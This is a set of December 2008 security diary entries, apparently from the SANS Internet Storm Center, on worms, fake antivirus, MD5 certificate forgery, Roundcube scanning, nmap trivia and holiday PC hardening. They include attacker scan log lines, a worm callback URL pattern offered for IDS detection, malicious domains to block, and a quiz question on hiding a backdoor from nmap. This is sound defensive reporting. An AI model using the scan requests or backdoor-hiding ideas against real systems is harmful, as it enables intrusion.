A leap second will be added to the clock at 12/31/2008 23:59:59 UTC tonight.  Clocks will go:

12/31/2008 23:59:58
12/31/2008 23:59:59
12/31/2008 23:59:60
01/01/2009 00:00:00
01/01/2009 00:00:01

Hopefully most IT folks will be otherwise occupied at that time and not focusing on their system clocks.

Have a Happy 1-second Delayed New Year.

David Goldsmith

Reader Nathan who sent us information about the Roundcube html2text.php vulnerability last week (see our previous diary here) has written in again about a new scan he is seeing for the "msgimport" binary included with Roundcube.  Nathan writes:

In regard to the Roundcube vulnerability it appears that attackers are now actively scanning for the presence of Roundcube with a specific user agent. It may be possible to craft a mod_security or fail2ban rule to match against this user agent. Two separate users have reported the scanning as well on separate ARIN netblocks. I have seen these scans first-hand on my webserver. Scans appear to originate from 87.233.128.0/18 with specific allocation details of "Assigned to customer 504". I don't think customer 504 is very nice :)

The User-Agent is in Romanian and translates, "All my love for the devil girl". Do you have any additional information regarding this user-agent and/or the specific vulnerability relating to msgimport? This does not appear to be the same vulnerability regarding code execution in html2text.php. I don't have additional behavior from the clients in the logs due to fail2ban taking action (HTTP 403 on connections without a host-header w/immediate fail2ban). Googling shows that scanning for this vulernability appears to have started around Dec 20th.

default 87.233.139.98 - - [29/Dec/2008:15:52:57 -0600] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "Toata dragostea mea pentru diavola"
default 87.233.139.98 - - [29/Dec/2008:15:52:57 -0600] "GET /roundcube//bin/msgimport HTTP/1.1" 403 226 "-" "Toata dragostea mea pentru diavola"

87.233.180.109 - - [30/Dec/2008:14:03:28 -0600] "GET /roundcube//bin/msgimport HTTP/1.1" 404 291 "-" "Toata dragostea mea pentru diavola"

Nathan, thanks for the information about the scanning and have a happy New Year.

David Goldsmith

Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067. 

It does various things to install and hide itself on the infected computer.  It removes any System Restore points that the user has set and disables the Windows Update Service.  It looks for ADMIN$ shares on the local network and tries to brute force the share passwords with a builtin dictionary.  At this point in time, the worm's purpose appears to be simply to spread and infect as many computers as possible.  After January 1, 2009, it will try to reach out to a variety of web sites to pull down an updated copy of itself.  You can find examples of the domain names in the Symantec W32.Downadup.B writeup.

The general form of the URL that it generates is: http://[GENERATED DOMAIN NAME].[TOP LEVEL DOMAIN]/search?q=%d so you could configure proxy servers or IDS sensors to start looking for "/search?q=%d" to find systems on your network that may have possibly been compromised by this worm.

David Goldsmith

Mozilla released Thunderbird 2.0.0.19 today.  The release notes are here.  This release addresses a number of security issues, most of which were also in the Firefox browser fixes 3.0.5 and 2.0.0.19/2.0.0.20 earlier this month.

  MFSA 2008-60 - Crashes with evidence of memory corruption (rv:1.9.0.5/1.8.1.19)
  MFSA 2008-61 Information stealing via loadBindingDocument
  MFSA 2008-64 XMLHttpRequest 302 response disclosure
  MFSA 2008-65 Cross-domain data theft via script redirect error message|
  MFSA 2008-66 Errors parsing URLs with leading whitespace and control characters
  MFSA 2008-67 Escaped null characters ignored by CSS parser
  MFSA 2008-68 XSS and JavaScript privilege escalation

I would like to quickly summarize the SSL MD5 issue presented at the CCC congress in Berlin today. Let me start with a quick FAQ:

1. How bad is it?
   Bad. But we will survive. The problem makes it possible to create "perfect" phishing sites with valid SSL certificates. The protocol impacted the most is probably HTTPS. But other protocols that use SSL may be affected as well.
2. What can I do? What do I have to do?
   Not much. This is not a "bug" in your browser. The protocol is not "broken". Just the way it is used by some certificate authorities is broken. If you use SSL for purposes like an SSL VPN, you may be able to limit the number of CAs you trust. The more you can limit it, the better.
3. Is my SSL certificate "affected"
   Maybe. See the vendor bulletins below for more details. It depends on who you got your certificate from. However, even if your certificate uses SHA1, someone could still use a fake MD5 certificate to impersonate your site.
4. Why switch to SHA1 and not RIPEMD/SHA2...
   Well... SHA1 is universally supported by current SSL libraries. SHA2 is still new and not well supported.
5. What protocols other then HTTPS are affected
   Everything that uses SSL. Most notably: SSL VPNs, S-MIME. ssh is not affected.
    

So what is the problem? The problem is that some certificate authorities use MD5 hases to validate certificates they issue. MD5 hashes have been shown to be weak for a while now, and this is just yet another attack using these known weaknesses. These certificate authorities have to change the way they do business (e.g. they have to use SHA1 hashes). Your browser includes a set of trusted certificate authorities. Sadly, some very popular CAs do use MD5s. Disabling these CAs is not recommended or feasible. The attack is still not easy, but very much possible and not just "theoretical". The researchers uses a cluster of 200 Playstation3 systems, and it took them a couple days. So a resonable size botnet would do it probably faster.

Once you have the fake duplicate CA, you could sign certificates at will and a browser would trust them. This can now be used for MiM (Monkey in the Middle) attacks and to impersonate trusted websites.

Basic "best pratices" still apply. This attack is not a "game changer". Most attack will probably still use bad certificates and ask the user to click "ok" to accept the bad certificate.

So short summary: It is bad, but there isn't much you can or need to do right now. Just stay vigilant and read the vendor announcements below for more details:

Vendor Announcements:

 Microsoft:
http://www.microsoft.com/technet/security/advisory/961509.mspx
http://blogs.technet.com/msrc/archive/2008/12/30/information-on-microsoft-security-advisory-961509.aspx

 Mozilla:
  http://blog.mozilla.com/security/2008/12/30/md5-weaknesses-could-lead-to-certificate-forgery/

(we will add more as we find them)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

A recent post at the Chaos Communication Congress website appears to give further detail into the anticipated presentation to be made later today (Tuesday, December 30th):

According to the website entry, the title of the presentation has been changed to:

"MD5 considered harmful today:  Creating a rogue CA certificate"

Further info is available here:

http://events.ccc.de/2008/12/30/the-cat-is-out-of-the-bag/

Using obfuscated javascript techniques, more "Fake Anti Virus" malware is continuing to present itself to unsuspecting Internet users - in the hopes of gaining an installation through the use of rather effective, social engineering methods.

Some of the latest incarnations observed in the past 24 hours continue to maintain low levels of AV detection (less than 15% based on VirusTotal analysis), and have removed the tell-tale "TDSS" signature from its rootkit driver names (although 1 AV vendor continues to flag the initial stage malware as Rootkit.Win32.TDSS).   Other subsequent stage downloads are getting labeled as Trojan.FakeAlert.AKV and Trojan.Fakealert.MW by a few other AV vendors.

 In terms of propagation, getting a "hit" from this malware is as easy as entering a series of search terms on your favorite search engine, and unluckily picking a search result that delivers nothing more than the misleading introductory screen and fake anti-virus pop-up alerts (with their associated "D-level" english grammar).  Should you unfortunately find yourself victim to this, remember to not click anywhere on the screen, but instead use "Task Manager - Applications" to terminate the victimized web browser session.

There's currently a lot of discussion on a couple different forums about  Alex Sotirov's and Jake Appelbaum's talk scheduled for Tuesday at the CCC. While their description (http://events.ccc.de/congress/2008/Fahrplan/events/3023.en.html) leaves something to be desired, you can find additional discussion on the BreakingPoint Systems' blog: http://www.breakingpointsystems.com/community/blog/Attacking-Critical-Internet-Infrastructure

A quote from HD's blog entry: 

"First things first; the reason for secrecy. Their research combined a known weakness in one area with a massive resource investment in another to show that a third party was vulnerable to a practical attack that affects the security of all Internet users. Security researchers often release code and technical documentation to demonstrate a flaw, but in this case, they went a step further and used the attack in the real world to obtain proof that it works. This process required interaction with a third party that will likely do whatever they can to save face once the details become public."

There is a lot of speculation but I'm inclined to just say we're all looking forward to hearing the details and when we have more verified information we'll post it and let y'all know.

For those of us who were not able to make it to Berlin for the Chaos Communications Congress this year, it is now possible to get streaming audio and video of the talks here: http://events.ccc.de/congress/2008/wiki/Streaming

They have a wide variety of formats including multicast options and some audio only.

We've gotten reports (thanks to Steve who first reported it) of Facebook users receiving messages indicating that their photos have been stolen and posted to a different site (blinksnap.com and cheepfry.com). When you go to the sites, they request name, email and a password and then show you a picture of a monkey as a joke. However, if you enter your facebook account info, all your friends are sent the following message:

"Have been uploading your pics on blinksnap-com-go there

Has anyone informed you your photos are on cheepfry-com-go there" 

This doesn't have to be a huge threat. It's only an issue if you are silly enough to provide it with meaningful credentials if you reply at all. Please folk, remember to use unique credentials and don't give away your username/password.

UPDATE: Jeff pointed out that many/most of the sites that are connected to this scam seem to be using an IFRAME pointing at rotating-destination.com/taf/taf.html and most of the sites are resolving to a single IP address - 208.78.242.184

(UTC, Sunday, December 28, 2008 at 22:32:00) We got various reports of another massive outage, in this case affecting the AT&T wireless network. The initial reports indicate it is affecting several US states: MI, OH, WI, IL, and IN. This is affecting Blackberry communications and other cell traffic

If you have any additional information about what is really going on (or if both are related incidents), please, let us know.

--
Raul Siles
www.raulsiles.com

An ISC reader wrote in to let us know about a current Level3 outage based on Internet Health Report. It seems the main issues are with its Detroit origin, although St. Louis seems to be affected too, probably as a consequence of the former one. In fact (although not necessarily directly related), Level3 main web page is not available: http://www.level3.com.

If you have any additional information, please, let us know.

--
Raul Siles
www.raulsiles.com

Recently the official (and highly recommended) NMAP book, "NMAP Network Scanning" by Fyodor, was published. I will post a review on my personal blog in the next few days (plus this challenge), but meanwhile, I thought it would be very productive to challenge you with a NMAP Trivia. The main goal is providing some entertainment during the holiday season and the early days of 2009, and at the same time, force you to practice and play with the latest stable nmap version, v4.76, trying to increase your technical knowledge, skills, and mastering of the traditional and current features of such an important security tool.

1.  What are the default target ports used by the current nmap version (4.76)? How can you change the target ports list? What (nmap) options can be used to speed up scans by reducing the number of target ports and still check (potentially) the most relevant ones? How can you force nmap to check all target ports?
2. How can you force nmap to scan a specific list of 200 target ports, only relevant to you?
3. What is the default port used by nmap for UDP ping discovery (-PU)? Why? If you don't know it from the top of your head ;), how can you easily identify this port without using other tools (such as a sniffer) or inspecting nmap's source code?
4. When nmap is run, sometimes it is difficult to know what is going on the backstage. What two (nmap) options allow you to gather detailed but not overwhelming information about nmap's port scanning operations? What other extra (nmap) options are available for ultra detailed information?
5. What are the preferred (nmap) options to run a stealthy TCP port scan? Particularly, try to avoid detection from someone running a sniffer near the person running nmap and focus on the extra actions performed by the tool (assuming the packets required to complete the port scan are not detected)?
6. Why port number 49152 is relevant to nmap?
7. What is the only nmap TCP scan type that classifies the target ports as "unfiltered"? Why? What additional nmap scan type can be used to discern if those ports (previously identified as "unfiltered") are in an open or closed state?
8. When (and it what nmap version) the default state for a non-responsive UDP port was changed on nmap (from "open" to "open|filtered")? Why?
9. What is the default scan type used by nmap when none is specified, as in "nmap -T4 scanme.nmap.org"? Is this always the default scan method? If not, what other scan method does nmap default to, under what conditions, and why?
10. What nmap features (can make or) make use of nmap's raw packet capabilities? What nmap features rely on the OS TCP/IP stack instead?
11. Nmap's performance has been sometimes criticized versus other network scanners. What (nmap) options can you use to convert nmap into a faster, stateless scanner for high performance but less accurate results?
12. What relevant nmap feature does not allow an attacker to use the decoy functionality (-D) and might reveal his real IP address?
13. What are the (nmap) options you can use to identify all the steps followed by nmap to fingerprint and identify the Web server version running on scanme.nmap.org?
14. As an attacker, what port number would you select to hide a listening service backdoor trying to avoid an accurate detection by nmap's default aggressive fingerprinting tests? Would it be TCP or UDP? Why? What additional (nmap) options do you need to specify as a defender to fingerprint the hidden service backdoor?
15. What is the language used to write NSE scripts, and what two other famous open-source security tools/projects currently use the same language?
16. What Linux/Windows command can you use to identify the list of NSE scripts that belong to the "discovery" category and will execute when this set of scripts is selected with the "--script discovery" nmap option?
17. How can you know the specific arguments accepted by a specific NSE script, such as those accepted by the whois.nse script?

Send your answers through our contact page using "NMAP Trivia" as the subject by January, 15. If you have other interesting nmap trick and tips, please, send them too. I will publish the best answers and other nmap usage suggestions on my next shift around mid-end January 2009.

If you want to stay up to date about the major nmap news and events I strongly recommend you to subscribe to the nmap-hackers mailing list (low traffic, with less than 10 messages this year). You can do so at http://cgi.insecure.org/mailman/listinfo/nmap-hackers.

--
Raul Siles
www.raulsiles.com

A vulnerability was reported on Windows Media Player claiming that using a specially crafted WAV, SND, or MIDI file can trigger an integer overflow and execute arbitrary code on the system.

One of our reader has tested the POC on a fully patched windows XP SP3 with both Media Player 9 and 11 and has shown to crash the application.

Some basic crash results with the latest Media Player 11 provided by our reader:

AppName: wmplayer.exe    AppVer: 11.0.5721.5145  ModName: quartz.dll
ModVer: 6.5.2600.5596    Offset: 000f2121

Unhandled exeption in wmplayer.exe (QUARTZ.DLL):0xC0000095: Integer Overflow

FILE_DESCRIPTION="DirectShow Runtime."

<EXE NAME="quartz.dll" FILTER="GRABMI_FILTER_THISFILEONLY">
<MATCHING_FILE NAME="quartz.dll" SIZE="1288192" CHECKSUM="0x4569894" BIN_FILE_VERSION="6.5.2600.5596" BIN_PRODUCT_VERSION="6.5.2600.5596" PRODUCT_VERSION="6.05.2600.5596" FILE_DESCRIPTION="DirectShow Runtime." COMPANY_NAME="Microsoft Corporation" PRODUCT_NAME="DirectShow" FILE_VERSION="6.05.2600.5596" ORIGINAL_FILENAME="Quartz.dll" INTERNAL_NAME="Quartz.dll" LEGAL_COPYRIGHT="Copyright (C) 1992-2001 Microsoft Corp." VERFILEDATEHI="0x0" VERFILEDATELO="0x0" VERFILEOS="0x4" VERFILETYPE="0x2" MODULE_TYPE="WIN32" PE_CHECKSUM="0x13DDB2" LINKER_VERSION="0x50001" UPTO_BIN_FILE_VERSION="6.5.2600.5596" UPTO_BIN_PRODUCT_VERSION="6.5.2600.5596" LINK_DATE="05/07/2008 05:12:40" UPTO_LINK_DATE="05/07/2008 05:12:40" VER_LANGUAGE="English (United States) [0x409]" />
</EXE>

74902107   mov         edi,edi
74902109   push        ebp
7490210A   mov         ebp,esp
7490210C   push        ebx
7490210D   mov         eax,dword ptr [ebp+8]
74902110   mov         ebx,dword ptr [ebp+0Ch]
74902113   mov         ecx,dword ptr [ebp+10h]
74902116   mul         eax,ebx
74902118   mov         ebx,ecx
7490211A   shr         ebx,1
7490211C   add         eax,ebx
7490211E   adc         edx,0
->74902121   div         eax,ecx     <- this is where the program crashed
74902123   shld        edx,eax,10h
74902127   pop         ebx
74902128   pop         ebp
74902129   ret         0Ch

Reader Nathan sent us an update on a vulnerability in Roundcube's html2text.php.  He said that the exploit is being seen in the wild and that it works.  Roundcube is a PHP powered webmail solution which many prefer over Squirrelmail. 

http://trac.roundcube.net/ticket/1485618
http://www.securiteam.com/unixfocus/6L00O15NFS.html

Nathan said that it was fixed on 12/12/2008, http://trac.roundcube.net/changeset/2148 and an official release was on 12/16/2008, http://sourceforge.net/forum/forum.php?forum_id=898542.  He also suggested that readers consider Suhosin, mod_chroot, and the below PHP.ini settings:

allow_url_include = Off
allow_url_fopen = Off
session.use_only_cookies = 1
session.cookie_httponly = 1
expose_php = Off
display_errors = Off
register_globals = Off
disable_functions = phpinfo

Thanks for the information and the links Nathan!

Marcus H. Sachs
Director, SANS Internet Storm Center

For years, Storm was the threat most commonly associated with malicious Christmas cards and other "timely announcements". Their techniques have gradually been adopted by other organized crime groups, and over the last days there has been an increase in malicious Christmas cards distributing the Waledac worm.

The e-mails consist of a hyperlink to a "Christmas card". When the user visits this site, he will see the following. The user will need to click on either button, get a Security Warning and will need to accept the fact that an executable is being run.

Most likely because of this, and because the cards are coming in fairly late in the holiday cycle, the threat has not been wildly succesful at propagating. Interestingly, even though the first reports of this threat we have are dated December 21st, many of the domains were already registered on December 1st.

Some of the domains that were reported to us by readers (thanks Mike) include:

funnychristmasguide.com
superchristmaslights.com
itsfatherchristmas.com
freechrismassite.com
justchristmasgift.com

Note that this list is very much incomplete. We may post updates later today.

For now, we recommend:

• Blocking the download of 'ecard.exe', or the affiliated domains on your corporate proxy;
• Ensure that your anti virus and anti spam solutions are updated frequently as the AV vendors build coverage for this new threat. Given the mass mailing nature, spam protection is likely to be the first to pick up on this.

In the long run, we recommend educating your users on the risk involved with gratuitous "warning" e-mails related to events, or greeting cards that look even the slightest bit suspicious. In addition, consider investigating solutions that control which untrusted code, originating from the internet, can be executed on corporate desktops.

Arbor Networks has an interesting blog entry up on the flux tactics involved with this threat here. For further data on the worm itself, visit Symantec's writeup.

For those of us who celebrate it, Christmas not only has religious meaning, it is also synonymous to gift giving. Though still a small percentage, every year the number of “connected” gifts increases: photo frames, USB sticks, cameras. Each of these now has a USB interface to connect to your desktop computer. This is a powerful innovation: combining these tools makes them much more powerful than each of them individually.
 
One disadvantage of such interconnectedness is the risk of malicious code hitching along with them. This is a problem of all ages: floppy disks were for a while a potent means of transmission for boot-sector viruses, downloads, and even CD-ROMs with infected installers all have been or are still important infection vectors. Just in the last few weeks, Samsung reportedly shipped photo frames with an infected CD in the package.

There are many common pathways for malicious code to make its way onto USB hardware, even though it looks like it may come straight “out of the box”. Generally, during assembly a small number of devices will get pulled out of production for quality assurance testing. An infection of equipment in the QA environment would be noticed far less quickly than in the production environment, as the set of affected samples would be drastically less.

In addition, vendors want to offer their customers a bright shopping experience, and this generally includes giving them the ability to return items that would turn out to be a misbuy. In almost all cases, these items will be tested for functionality, but that is never a 100% guarantee that its state is identical to the newly manufactured item. What happened while in possession of a customer after the initial purchase is somewhat unclear, and could include introduction of unexpected code.

The good news, however, is that most Autorun malware spreads relatively rapidly – making it something the anti virus companies stay on top of. If you are running up-to-date anti virus software, it’s unlikely you will be at much risk of any of the major Autorun malware families.

If you’d like to provide some additional protection to your family members for the holidays, you may want to consider running a behavioral based anti malware product in addition to your regular anti virus. These applications apply a techniqua called behavioral profiling. They do not detect viruses based on a signature applied to every binary, but instead look at the behavior of every binary running on the system.

Every “suspicious” action, such as writing to windows\system32, installing a service, or making an internet connection is given a specific rating, and once that rating exceeds a preset threshold for a binary, the solution will flag the process as potentially malicious and will alert the user. While we can't recommend vendors, common solutions include Threatfire, Primary Response SafeConnect and NovaShield. Some common anti virus packages even include this functionality, so talk to your existing vendor as well. Combining this with signature based anti virus provides the best of both worlds on end user platforms, where the owner of the system needs to be able to have full control and ability to install whatever code he wishes. Known malicious code will be stopped before execution and identified, and unknown malicious code will be blocked before it does too much harm.

From all of us here at the SANS Internet Storm Center, have a great holiday season!

Cheers,
Maarten

On a sad note, CastleCops has decided to shut their proverbial doors and close down their site. They've been a valuable site and we're sad to see them go. Their goodbye message can be found at http://www.castlecops.com

Thank you Warners! And all of you family IR staff get ready for the Holidays!

Gary Warner has posted "More than 1 Million Ways to Infect Your Computer" an interesting look at how "An unknown hacker has been on a Search Engine Optimization rampage to flood search engines with more than a million ways to infect yourself with his virus".

And earlier today, after a bout with some nasty malware, Joe Warner sent us Holiday wishes in the following Christmas story about Antivirus 2009.

An early present from the makers of Antivirus 2009!

Dear handlers,

Twas five days before Christmas and all through the house, no malware was detected on Windoze or MacOS.  When all of the sudden and to my surprise, my Daughter shouted "Dad!!!!!" with big/frightened eyes!  "I just wanted to play fashion dress-up and powder my virtual nose but when I went to the site, the Internet Explorer froze!  It then launched another window with scantily-clad girls and now nothing works, I can't even change my curls!!  Oh please help me fix this, did I do something bad?  Oh please help me Daddy and please don't get mad."

Indeed, it's with humble embarrassment that I report the first infection of any of my PC's in almost ten years.  Working in IT and following your advice over the years, I thought I was pretty much on top of things.  Sure, me and my Wifes main computers are Mac's, leaving my Daughter with a PC running XP Pro but I've been pretty good about keeping that PC current on patches and antivirus updates.  I also had the router's firewall and the Windows one running but I found out, painfully, that that wasn't enough.

I'm sure you are all too familiar with the Antivirus 2009 virus?  Well, I'd never heard of it until last Saturday and wished I hadn't.  It blew right by my firewalls and install of McAfee, trashed IE, imbedded itself in the taskbar, Documents and Settings, Windows\system32 and other crannies.  It wiped system restore and spawned processes that were impossible to kill.  A scan with McAfee didn't find anything.  Kapersky's online scan found 6 infected files and showed me their locations but didn't provide any hints on how to get rid of them.  All the files were attached to running processes, so it wouldn't let me delete them + wouldn't let me kill the processes.

The next morning, after quite an exhaustive search with Google, I came across Avira's free rescue CD:

http://www.avira.com/en/support/support_downloads.html

I powered up another Windows PC that we don't normally use, made sure it was current on patches, downloaded and burned the Avira image.  Then, I booted the infected PC off the CD, waited for it to detect my Internet connection and update it's signatures.  After that, I had it run it's scan and in a short time, it finished saying it had detected 13 infected files.  It said it couldn't delete them but renamed them, placing a .XXX at the end.  I was then able to boot the PC, perform a search for those files using *.XXX and delete them.  After that, I performed a scan with F-Secure's Blacklight rootkit detection and elimination tool: http://www.f-secure.com/security_center/ , which found no malware.

I removed the shortcuts to IE, installed Firefox with noscript, cleared out all temp folders and deleted the bookmark to the infected Fashion-Dressup site my Daughter had visited.

My PC appears to be back to normal now but after a compromise like that, I just don't trust that something wasn't overlooked.  So, I'll be reinstalling Windows again soon.

I hope you all enjoyed my little story, which proves that patches, firewalls, antivirus and proactive security measures aren't always enough.  On the lighter side, how is it that someone can program such nasty malware and not know how to spell?  AV 2009's popup windows displayed so many misspellings, it was actually quite comical.  I mean, it's pretty bad when you can't even spell the word "unauthorized" correctly.  Wow!

Merry Christmas to all at the ISC and may no malware byte!  ;-)

Joe

I've had reports of excellent, free help for removing rogue antivirus from Microsoft's technical support - "Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates".

Other links to descriptions containing information on parts of what Joe ran into;

CA;
http://community.ca.com/blogs/securityadvisor/archive/2008/12/12/identifying-and-removing-antivirus-2009-rootkit.aspx

MS;
http://blogs.technet.com/mmpc/archive/2008/12/10/win32-yektel-the-other-kind-of-rogue.aspx

http://www.microsoft.com/security/portal/Entry.aspx?name=Trojan%3aWin32%2fFakeXPA
 

According to published reports, the vulnerability was reported to Microsoft in April and "a fix for this vulnerability has been completed", but there's no patch release date mentioned at this time. Exploit code is available.

From the Security Advisory (961040);
What systems are primarily at risk from the vulnerability?
"Clients and applications that utilize MSDE 2000 or SQL Server 2005 Express are at risk of remote attack if they have modified the default installation to accept remote connections, if they allow untrusted users access to MSDE 2000 or SQL Server 2005 Express, or if an application that uses MSDE 2000 or SQL Server 2005 Express has a SQL Injection vulnerability.

All systems running one of the affected Microsoft SQL Server software where a malicious user is allowed to log on are at risk of exploitation of this vulnerability. In addition, Web applications with a SQL Server back-end database are at risk if a SQL Injection vulnerability exists".

As you go through major deployments, there is an increased risk to your network.  When things are in flux, your security posture is more vulnerable as there are many moving parts.    What can you do to reduce that risk before you deploy?  Well, being process oriented is a good start.  Following a process helps to ensure that you have accounted for all major events and met the requirements.  An event that is very critical from the security side, is the final review of device configurations.  Why is this so critical? Because many times things get missed and our networks are getting very complex.  You can logically divide your network to save on resources, group like traffic, add proxies, firewalls etc.  This adds to more room for mistakes.  Many times, these devices are configured without thinking about the security of the device but rather from the stand point of just getting them to work.

Before you deploy, I'm sure everyone does vast amounts of testing to ensure you have things configured just the way you want them.  Now you think its time to roll it out, but what about a final configuration review of all the devices before you deploy? If there are mistakes, you need to find them ahead of time right? Network modeling offers great potential, but even the best modeling tools can't support all the different device types.  It all sounds very simple, but how do you conduct a configuration reveiw if this is a major deployment and you have a couple of hundred devices or even if its a smaller deployment of 10 to 20?  What exactly are you looking for anyway? Here are somethings that I believe gets over looked in this area and will hurt your security posture.

1.  Test configurations left on the devices.  Someone set up a test vlan, firewall rule, account, acl, VRF etc. and no one remembered to take it out or even knew it had been created. It never fails, when your reviewing configs that you will find something leftover from testing.  Also, don't forget to confirm all the default account passwords have been changed.

2.  Logical Configurations being copied.  As many devices can be deployed logically, the ability to copy configs of virtual instances and use them again are built into most of them.  With this comes problems of carrying over unintended configurations.  In reviews, I have found many device instances that have been created that contained residual configurations from those they were copied from.

3.  Default settings left default.  In many cases, this may be ok but in others, it can be detrimental.  Why is that?  Because they are default and well known.  A quick Google can tell you what the default settings are for any device out there.  For instance, most IDes have the ability to configure how it handles fragmentation such as reassembly methods, buffer sizes etc.  More often then than not, these defaults are not changed or even realized that they exist.  That affords the attacker the advantage to know how to bypass your IDS.  It's the same scenario for many default configurations of many other devices.  The attackers know that many settings do not get changed and they are counting on it. 

4.  Services being left turned on.  Again, default configurations can get you.  Many times services are running from the initial startup and no one realizes it. It can also be they were turned on to troubleshoot and then not turned off again.  No matter what, a final review of what is turned on is extremely important.

5.  Protocols being allowed.  As you look at your network devices, one of the biggest offender I find is allowing protocols in because it's believed that you "need them" and a failure to understand how something works.  ICMP is a prime example.  It is amazing that people still see ICMP and think its just "ping".  A lack of understanding of the protocols and how they work is more often than not the culprit. 


If you have other mistakes you have found as you do configuration reviews, please let me know.  If you have a method that has streamlined this process successfully, please pass that along as well. 

Security is such an integral of our lives as IT professionals.  We constantly fret about how to secure our networks ... to the point of paranoia.  We diligently monitor the latest security issues.  You wouldn’t be reading this now if you didn’t, right?   

As security experts, we take for granted that others don’t comprehend what we know to be fact.  I am constantly amazed at the lack of interest, knowledge or commitment to information security.  Although we are not a c-level executives stressing about how to make a profit in these turbulent times, as budget cuts are becoming reality, we are feeling the pain of the proverbial “tightening of the belt”.   

How can we keep security spending on par with threats and exposure?  Are we doing our jobs if we can’t prove ROI?  How do you provide the proper information to management so they can make better decisions about capital investments?  I’d like to hear your war stories.  Do you provide metrics, statistics or resort to fear mongering?  Use our contact page to let us know.

 I look forward to hearing how creative you are getting.

 Mari     iMarSolutions

Update:  Ben sent in this gem:  There is an old saying in the InfoSec (information security) world, "Good security is just good systems administration". Whilst this is a limited perspective, as security extends well beyond just the system administration functions of the organisation, it is none-the-less accurate. A more holistic and accurate way of saying it is however, "Good security is just a function of good quality."

Another reader said "Security awareness training and a million dollars here or there is a good investment to preserve the funding pipeline and organizational reputation. To the executives it's less about ROI than protecting image, funding, and cost avoidance with respect to reporting breaches." 

In addition, think about centralizing and using your outsourcing budget to save money.  There may be wiggle room in that as well as some pretty good metrics.

Received an email from a reader today (thank you Florian!): 

It says that they ordered two "SPF-85H 8-Inch Digital Photo Frames w/1GB Internal Memory" today for Christmas, and promptly received this email shortly after:

--

Greetings from Amazon.com.

We have recently learned that Samsung has issued an alert affecting its SPF-85H 8-Inch Digital Photo Frame. Our records indicate that you have purchased one of the digital photo frames through the Amazon.com website and are therefore affected by this alert.

The alert involves the SPF-85H 8-Inch Digital Photo Frames w/1GB Internal Memory, designed to work with Windows-based PCs via a USB connector. They were sold between October and December 2008 for about $150.

The alert concerns discovery of the W32.Sality.AE worm on the installation disc SAMSUNG FRAME MANAGER XP VERSION 1.08, which is needed for using the SPF-85H as a USB monitor. If you are using Vista or a different version of Frame Manager, this issue does not affect you.

If your anti-virus software displays a Virus Alert after you have installed Samsung Frame Manger 1.08 using the installation CD, please perform the following procedure:

1. Quarantine or delete the W32.Sality.AE worm.

2. Uninstall the current version of Frame Manager 1.08 you installed from the install CD. (Click Start &#62; Settings &#62; Control Panel &#62; Add or Remove Programs. Find and then click Frame Manager in the Add or Remove Programs dialog, and then click Remove.)

3. Download and install the updated version of Frame Manager XP 1.082 from the Samsung Download Center: www.samsung.com/us/support/download/supportDown.do?group=&type=&subtype=&model_nm=SPF-85H&language=&cate_type=all&dType=D&mType=SW&vType=L&prd_ia_cd=05200100&disp_nm=SPF-85H

4. After you install Samsung Frame Manager 1.082, reboot your computer to complete the process.

If these steps do not correct the problem, please call Samsung Service Hotline at 1.800.SAMSUNG (800-726-7864).

If you purchased this item as a gift for someone, please notify the recipient immediately and provide them with the information in the Samsung Alert concerning this issue.

We regret the inconvenience this alert has caused you but trust you will understand that the safety of our customers is our highest priority.

Thanks for shopping at Amazon.com.

Sincerely,

Customer Service
Amazon.com
http://www.amazon.com/

--

Hey, at least they are telling you!

-- Joel Esler http://www.joelesler.net

For those of you interested in reading all the IE documents, links, diary entries and such that we have posted over the past few days (weeks?), please see here:

0-day exploit for Internet Explorer in the wild -- Bojan Zdrnja

MSIE 0-day Spreading via SQL Injection -- Johannes Ullrich

The continuing IE sage -- workarounds -- Jim Clausing

Microsoft announces an out of band patch for IE zero day -- Donald Smith

Internet Explorer 960714 is released -- Donald Smith

IE bug being exploited by Word Documents -- Joel Esler

Happy reading!

-- Joel Esler http://www.joelesler.net

We've published several articles over the past few days detailing the latest IE flaw.  However, now one of our readers (thanks roseman) writes in with an article posted over on ComputerWorld.

Turns out that this bug is now being exploited through Word documents.  While this is basically a simple evolution of the exploit method, I imagine that this is only the first or second evolution.  There are more to come I am sure.  We don't have any samples of this malware yet, so if you have any, we'd like a few examples.

-- Joel Esler http://www.joelesler.net

Firefox (Mozilla) has just released version 2.0.0.20 in what, is possibly the last update to the 2.x codebase.  If you aren't already on 3.x, I suggest you upgrade.

However, for those of you that are still on Firefox 2.x, I suggest you grab your last meal:  http://www.mozilla.com/en-US/firefox/all-older.html

-- Joel Esler http://www.joelesler.net

We received a report from a reader today of an article posted online: here, that says that supposedly 3 out of the 4 internet cables (really?  there are only 4?) that run between Asia and North America have been damaged. 

We have no secondary confirmation of this, other than this article, and if we hear anything we'll post an update, so if you have any information, please write in, via the contact link above.

Internetpulse isn't reporting any problems:  here.

-- Joel Esler http://www.joelesler.net

It is that time of the year again when people rush out and buy computers, although in the current economic climate this may be a bit less than usual.  Brent (thanks), suggested that maybe we could do a list of things you should be doing to help protect that family member who is about to receive their new online toy.

So here is a list of things to do (thanks Swa) before you hand the machine over to your friend, family member, distant relative neighbour, or friendly stranger.

1. Diversity is good,  consider Linux, Mac, Windows.
   My kids for example are very happy with their Linux box and Mac and as soon as I explained that the fox or compas did the same thing as the big blue E, which they are taught to look for at school, they were off and running.
   As Swa says,  diversity is not just good for agriculture. 
2. Start by creating installation/recovery disks.  Many machines do not provide these any more, they are on a partition, which as I discovered you can accidentally make disappear.
3. Install from scratch if you can.  Leave off all the bloatware that comes with many of the new machines.  Typically the apps aren't needed anyway.  (create a new recovery disk at the end).
4. Harden the system by removing unnecessary components
5. Buy them a few years worth of AV/AS protection.  Many people use the AV that comes installed with the machine and don't realise that it expires in three months or so.
6. Average Joe user rights should be enough, make a normal user and an admnistrator, teach the user to not use the administrator user.  I often don't even tell them what the password is,  as long as they can install things they are happy.   Make a second admin account for your self if it is likely that you will become the helpdesk.  (With permission of course !, Thanks Rovert for the reminder). 
7. Make sure all software is auto-updating, teach user to allow them.
8. Make a backup, teach user how to repeat this, and how to restore.
9. Get alternate browser, again diversity is good. Consider Firefox, Safari, Opera, .... It's a sad world if 70% of it is vulnerable to the same bug.
10. Secure the browser: e.g. firefox: install the add-ons NoScript and CookieSafe, teach user how to use it.
